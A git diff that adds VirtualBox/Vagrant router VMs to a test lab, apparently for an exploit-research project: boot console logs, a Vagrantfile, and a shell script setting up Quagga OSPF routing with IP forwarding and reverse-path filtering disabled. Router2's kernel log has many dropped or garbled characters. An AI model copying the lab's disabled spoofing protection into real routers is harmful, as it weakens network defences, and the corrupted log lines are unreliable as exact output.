+[ OK ] Created slice system-serial\x2dgetty.slice. +[ 11.354381] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 11.369488] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 11.450586] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 11.471023] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 11.480659] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 11.490986] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 11.556834] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 11.594147] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 11.604795] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 11.652694] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 11.666228] systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. +[ 11.704700] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 11.724891] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 11.750989] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 11.765392] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 11.784347] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 11.812995] systemd[1]: Starting Remount Root and Kernel File Systems... +[ 11.820113] EXT4-fs (sda1): re-mounted. Opts: (null) + Starting Remount Root and Kernel File Systems... +[ 11.832766] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 11.843870] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 11.861658] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 11.872213] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 11.887348] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 11.899399] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 11.930817] Loading iSCSI transport class v2.0-870. +[ 11.940786] systemd[1]: Starting Journal Service... + Starting Journal Service... +[ 11.949474] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 11.963020] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 11.980758] systemd[1]: Reached target Slices. +[ OK ] Reached target Slices. +[ 11.991356] iscsi: registered transport (tcp) +[ 12.013649] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 12.023500] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 12.039462] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 12.051910] systemd[1]: Started Create list of required static device nodes for the current kernel. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ 12.118597] systemd[1]: Started Uncomplicated firewall. +[ OK ] Started Uncomplicated firewall. +[ 12.172155] systemd[1]: Started Remount Root and Kernel File Systems. +[ OK ] Started Remount Root and Kernel File Systems. +[ 12.209433] systemd[1]: Started Set console keymap. +[ OK ] Started Set console keymap. +[ 12.231561] systemd[1]: Started Nameserver information manager. +[ OK ] Started Nameserver information manager. +[ 12.256937] iscsi: registered transport (iser) +[ 12.257574] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK ] Started Load Kernel Modules. +[ OK ] Started LVM2 metadata daemon. + Mounting FUSE Control File System... + Starting Apply Kernel Variables... + Starting udev Coldplug all Devices... + Starting Flush Journal to Persistent Storage... + Starting Load/Save Random Seed... + Starting Create Static Device Nodes in /dev... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Apply Kernel Variables. +[ OK ] Started Load/Save Random Seed. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started Create Static Device Nodes in /dev. + Starting udev Kernel Device Manager... +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting Set console font and keymap... + Starting Tell Plymouth To Write Out Runtime Data... + Starting LSB: AppArmor initialization... + Starting Initial cloud-init job (pre-networking)... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Found device /dev/ttyS0. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. + Starting Load AppArmor profiles managed internally by snapd... + Starting Create Volatile Files and Directories... +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Started Set console font and keymap. +[ OK ] Started Create Volatile Files and Directories. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Created slice system-getty.slice. +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ 14.303125] cloud-init[493]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:26 +0000. Up 13.29 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s10. +[ OK ] Started ifup for enp0s3. +[ OK ] Started ifup for enp0s9. +[ OK ] Started ifup for enp0s8. + Starting Raise network interfaces... +[ OK ] Started Raise network interfaces. +[ OK ] Reached target Network. + Starting Initial cloud-init job (metadata service crawler)... +[ 18.862431] cloud-init[1315]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:30 +0000. Up 17.46 seconds. +[ 18.871088] cloud-init[1315]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ +[ 19.042093] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.069064] cloud-init[1315]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 19.082229] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.082349] cloud-init[1315]: ci-info: | enp0s10 | True | 192.168.101.2 | 255.255.255.0 | global | 08:00:27:80:81:f6 | +[ 19.082456] cloud-init[1315]: ci-info: | enp0s10 | True | fe80::a00:27ff:fe80:81f6/64 | . | link | 08:00:27:80:81:f6 | +[ 19.082561] cloud-init[1315]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | +[ 19.082676] cloud-init[1315]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 19.082789] cloud-init[1315]: ci-info: | enp0s8 | True | 192.168.1.254 | 255.255.255.0 | global | 08:00:27:4e:d5:19 | +[ 19.082895] cloud-init[1315]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe4e:d519/64 | . | link | 08:00:27:4e:d5:19 | +[ 19.082998] cloud-init[1315]: ci-info: | enp0s9 | True | 192.168.100.1 | 255.255.255.0 | global | 08:00:27:25:02:6b | +[ 19.083104] cloud-init[1315]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe25:26b/64 | . | link | 08:00:27:25:02:6b | +[ 19.083210] cloud-init[1315]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 19.083316] cloud-init[1315]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 19.083424] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.083542] cloud-init[1315]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ +[ 19.083662] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 19.083783] cloud-init[1315]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 19.083895] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 19.084031] cloud-init[1315]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 19.084146] cloud-init[1315]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 19.084314] cloud-init[1315]: ci-info: | 2 | 192.168.1.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 19.084433] cloud-init[1315]: ci-info: | 3 | 192.168.100.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | +[ 19.084554] cloud-init[1315]: ci-info: | 4 | 192.168.101.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | +[ 19.084671] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 19.084791] cloud-init[1315]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 19.084910] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.085026] cloud-init[1315]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 19.085133] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.085236] cloud-init[1315]: ci-info: | 0 | fe80::/64 | :: | enp0s10 | U | +[ 19.085345] cloud-init[1315]: ci-info: | 1 | fe80::/64 | :: | enp0s9 | U | +[ 19.085459] cloud-init[1315]: ci-info: | 2 | fe80::/64 | :: | enp0s8 | U | +[ 19.085571] cloud-init[1315]: ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | +[ 19.085685] cloud-init[1315]: ci-info: | 10 | ff00::/8 | :: | enp0s10 | U | +[ 19.085807] cloud-init[1315]: ci-info: | 11 | ff00::/8 | :: | enp0s9 | U | +[ 19.085930] cloud-init[1315]: ci-info: | 12 | ff00::/8 | :: | enp0s8 | U | +[ 19.086061] cloud-init[1315]: ci-info: | 13 | ff00::/8 | :: | enp0s3 | U | +[ 19.086188] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ +[ OK ] Started Initial cloud-init job (metadata service crawler). +[ OK ] Reached target Network is Online. + Starting iSCSI initiator daemon (iscsid)... +[ OK ] Reached target Cloud-config availability. +[ OK ] Reached target System Initialization. + Starting LXD - unix socket. + Starting Socket activation for snappy daemon. +[ OK ] Started Message of the Day. +[ OK ] Listening on D-Bus System Message Bus Socket. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Started ACPI Events Check. +[ OK ] Reached target Paths. +[ OK ] Started Daily Cleanup of Temporary Directories. +[ OK ] Listening on ACPID Listen Socket. +[ OK ] Started Daily apt download activities. +[ OK ] Started Daily apt upgrade and clean activities. +[ OK ] Reached target Timers. +[ OK ] Listening on LXD - unix socket. +[ OK ] Listening on Socket activation for snappy daemon. +[ OK ] Started iSCSI initiator daemon (iscsid). + Starting Login to default iSCSI targets... +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. +[ OK ] Started FUSE filesystem for LXC. +[ OK ] Started ACPI event daemon. + Starting LSB: Record successful boot for GRUB... + Starting Login Service... + Starting LSB: MD monitoring daemon... +[ OK ] Started Regular background program processing daemon. + Starting Snap Daemon... + Starting System Logging Service... + Starting Virtualbox guest utils... + Starting Accounts Service... + Starting OpenBSD Secure Shell server... +[ OK ] Started Deferred execution scheduler. +[ OK ] Started D-Bus System Message Bus. + Starting /etc/rc.local Compatibility... + Starting LXD - container startup/shutdown... +[ OK ] Started System Logging Service. +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started Login Service. +[ OK ] Started OpenBSD Secure Shell server. +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Login to default iSCSI targets. +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting LSB: daemon to balance interrupts for SMP systems... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting Permit User Sessions... + Starting LSB: start and stop the Quagga routing suite... + Starting LSB: automatic crash report generation... +[ OK ] Started Unattended Upgrades Shutdown. + Starting Authenticate and Authorize Users to Run Privileged Tasks... +[ OK ] Started Snap Daemon. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started Permit User Sessions. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Accounts Service. + Starting Hold until boot process finishes up... + Starting Terminate Plymouth Boot Screen... + Starting Wait until snapd is fully seeded... +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started LSB: start and stop the Quagga routing suite. +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started Wait until snapd is fully seeded. + Starting Apply the settings specified in cloud-config... +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Started Getty on tty1. +[ OK ] Reached target Login Prompts. + Starting Set console scheme... +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Set console scheme. +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 25.889438] cloud-init[1596]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:38 +0000. Up 25.47 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 27.489163] cloud-init[1616]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 27.23 seconds. +[ 27.622203] cloud-init[1616]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.46 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS router11 ttyS0 + +router11 login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..9532eaa --- /dev/null +++ b/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/routers/router2 \ No newline at end of file diff --git a/virtual-test-environment/routers/router2/Vagrantfile b/virtual-test-environment/routers/router2/Vagrantfile new file mode 100644 index 0000000..745513a --- /dev/null +++ b/virtual-test-environment/routers/router2/Vagrantfile @@ -0,0 +1,21 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-router2" + + config.vm.network "forwarded_port", guest: 22, host: 22115, id: 'ssh' + config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.2.254", virtualbox__intnet: "intnet-2" + config.vm.network "private_network", ip: "192.168.100.2", virtualbox__intnet: "intnet-100" + config.vm.network "private_network", ip: "192.168.102.2", virtualbox__intnet: "intnet-102" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-router2" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/routers/router2/setup_net.sh b/virtual-test-environment/routers/router2/setup_net.sh new file mode 100755 index 0000000..d29131e --- /dev/null +++ b/virtual-test-environment/routers/router2/setup_net.sh @@ -0,0 +1,62 @@ +#!/bin/bash +# + +OLD_NAME=vague-router +HNAME=router2 + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME +apt-get update +apt-get install quagga quagga-doc traceroute +cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf +cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf +chown quagga.quaggavty /etc/quagga/*.conf +chmod 640 /etc/quagga/*.conf +sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons +sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons +echo 'VTYSH_PAGER=more' >>/etc/environment +echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc +cat >> /etc/quagga/ospfd.conf << EOF +interface enp0s8 +interface enp0s9 +interface enp0s10 +interface lo +router ospf + passive-interface enp0s8 + network 192.168.2.0/24 area 0.0.0.0 + network 192.168.100.0/24 area 0.0.0.0 + network 192.168.102.0/24 area 0.0.0.0 +line vty +EOF +cat >> /etc/quagga/zebra.conf << EOF +interface enp0s8 + ip address 192.168.2.254/24 + ipv6 nd suppress-ra +interface enp0s9 + ip address 192.168.100.2/24 + ipv6 nd suppress-ra +interface enp0s10 + ip address 192.168.102.2/24 + ipv6 nd suppress-ra +interface lo +ip forwarding +line vty +EOF +/etc/init.d/quagga start + +# Disable rp_filter and enable forwarding for routers +# +echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s3.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s9.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s10.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p + +exit diff --git a/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..6f23a1f --- /dev/null +++ b/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,672 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.00000] Initializing cgroup subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generc (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=tyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GeuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context sze i 832 bytes, using 'standar' fomat. +[ 0.000000] e820: BIOS-provded physcal RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.00000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x000000000010000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervior detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MR: Disabled +[ 0.000000] x86/PAT: MRRs disabl, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Coonfiuration [0-]: WB T UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-ble at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disale +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ .000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 0000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: CS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 2080105) +[ .000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, rimary cpu clock +[ 0.00000] kv-clok: using sche offs of 3639878016 cycles +[ 0.000000] clocksource: kvm-cloc mask: 0xfffffffffffffff max_cycles: 0x1d42e4dfb, max_idle_ns: 88590591483 ns +[ 0.000000 Zone ranes +[ 0.00000] DMA [mem 0x00000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x000000000100000-0x00000000ffeffff] +[ 0.000000] Normal empt +[ 0.00000] Device empty +[ 0000000] Movable zone start for eac node +[ 0.000000] Early mmory node ranges +[ 0.000000] node 0: [mem 00000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x000000000000100-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Tier IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: NT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820:: [m 0x40000000-0xfebfffff] available for PCI devices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User page tables isolation: enabled +[ 0.000000] Hierarchical RCU implementation. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 2.548984] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 2.552312] pid_max: default: 32768 minimum: 301 +[ 2.556585] ACPI: Core revision 20150930 +[ 2.559376] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 2.568111] Security Framework initialized +[ 2.570828] Yama: becoming mindful. +[ 2.576301] AppArmor: AppArmor initialized +[ 2.578169] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 2.585174] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 2.587998] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 2.590791] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 2.593974] Initializing cgroup subsys io +[ 2.595772] Initializing cgroup subsys memory +[ 2.597570] Initializing cgroup subsys devices +[ 2.599448] Initializing cgroup subsys freezer +[ 2.602117] Initializing cgroup subsys net_cls +[ 2.604868] Initializing cgroup subsys perf_event +[ 2.606725] Initializing cgroup subsys net_prio +[ 2.608773] Initializing cgroup subsys hugetlb +[ 2.610526] Initializing cgroup subsys pids +[ 2.625138] mce: CPU supports 0 MCE banks +[ 2.627220] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 2.629792] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 2.632218] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 2.637410] Spectre V2 : Mitigation: Full generic retpoline +[ 2.641863] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 2.647748] Speculative Store Bypass: Vulnerable +[ 2.649859] SRBDS: Unknown: Dependent on hypervisor status +[ 2.652113] MDS: Mitigation: Clear CPU buffers +[ 2.656626] Freeing SMP alternatives memory: 36K +[ 2.670551] ftrace: allocating 32339 entries in 127 pages +[ 2.782531] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 2.783988] smpboot: Max logical packages: 1 +[ 2.785375] x2apic enabled +[ 2.787490] Switched APIC routing to physical x2apic. +[ 2.791797] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 2.902569] APIC calibration not consistent with PM-Timer: 98ms instead of 100ms +[ 2.907442] APIC delta adjusted to PM-Timer: 6250268 (6138640) +[ 2.910804] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 2.916096] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 2.948653] KVM setup paravirtual spinlock +[ 2.958280] x86: Booting SMP configuration: +[ 2.968692] .... node #0, CPUs: #1 +[ 2.988639] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 3.038007] mce: CPU supports 0 MCE banks +[ 3.051680] x86: Booted up 1 node, 2 CPUs +[ 3.052944] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 3.062040] devtmpfs: initialized +[ 3.071009] evm: security.selinux +[ 3.073821] evm: security.SMACK64 +[ 3.086917] evm: security.SMACK64EXEC +[ 3.094604] evm: security.SMACK64TRANSMUTE +[ 3.100914] evm: security.SMACK64MMAP +[ 3.107131] evm: security.ima +[ 3.119266] evm: security.capability +[ 3.120417] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 3.122572] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 3.124141] pinctrl core: initialized pinctrl subsystem +[ 3.133057] RTC time: 22:38:13, date: 01/25/21 +[ 3.134657] NET: Registered protocol family 16 +[ 3.148766] cpuidle: using governor ladder +[ 3.159559] cpuidle: using governor menu +[ 3.160546] PCCT header not found. +[ 3.161551] ACPI: bus type PCI registered +[ 3.162580] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 3.164212] PCI: Using configuration type 1 for base access +[ 3.187926] ACPI: Added _OSI(Module Device) +[ 3.199874] ACPI: Added _OSI(Processor Device) +[ 3.202178] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 3.211889] ACPI: Added 